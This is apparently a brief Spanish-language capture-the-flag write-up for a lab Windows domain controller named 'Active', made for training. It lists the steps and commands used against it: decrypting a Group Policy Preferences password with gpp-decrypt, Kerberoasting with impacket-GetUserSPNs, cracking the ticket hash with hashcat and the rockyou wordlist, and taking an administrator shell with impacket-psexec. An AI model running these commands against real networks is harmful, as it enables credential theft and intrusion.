Active
Resumen de la resolución
Máquina Windows DC con servicio SMB expuesto
Explotación SMB con pivoting de usuarios
Abuso de GPP (Group Policy Preference) para conseguir credenciales encriptadas con Microsoft AES
Ataque Kerberoasting
Habilidades adquiridas
Explotación de GPP, característica que se puede encontrar en sistemas Windows Server 2008 y previos, para conseguir credenciales encriptadas almacenadas en el archivo Groups.xml y desencriptarlas posteriormente con gpp-decrypt.
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
Comandos y herramientas destacables
Kerberoasting
impacket-GetUserSPNs active.htb/SVC_TGS -dc-ip 10.129.228.53 -request -o krb5tgs.txt
hashcat -m 13100 krb5tgs_hashes /usr/share/wordlists/rockyou.txt
Obtención de shell abusando de permisos de escritura en recursos compartidos por SMB
impacket-psexec active.htb/administrator@10.129.228.53
Walkthrough en YouTube:
Última actualización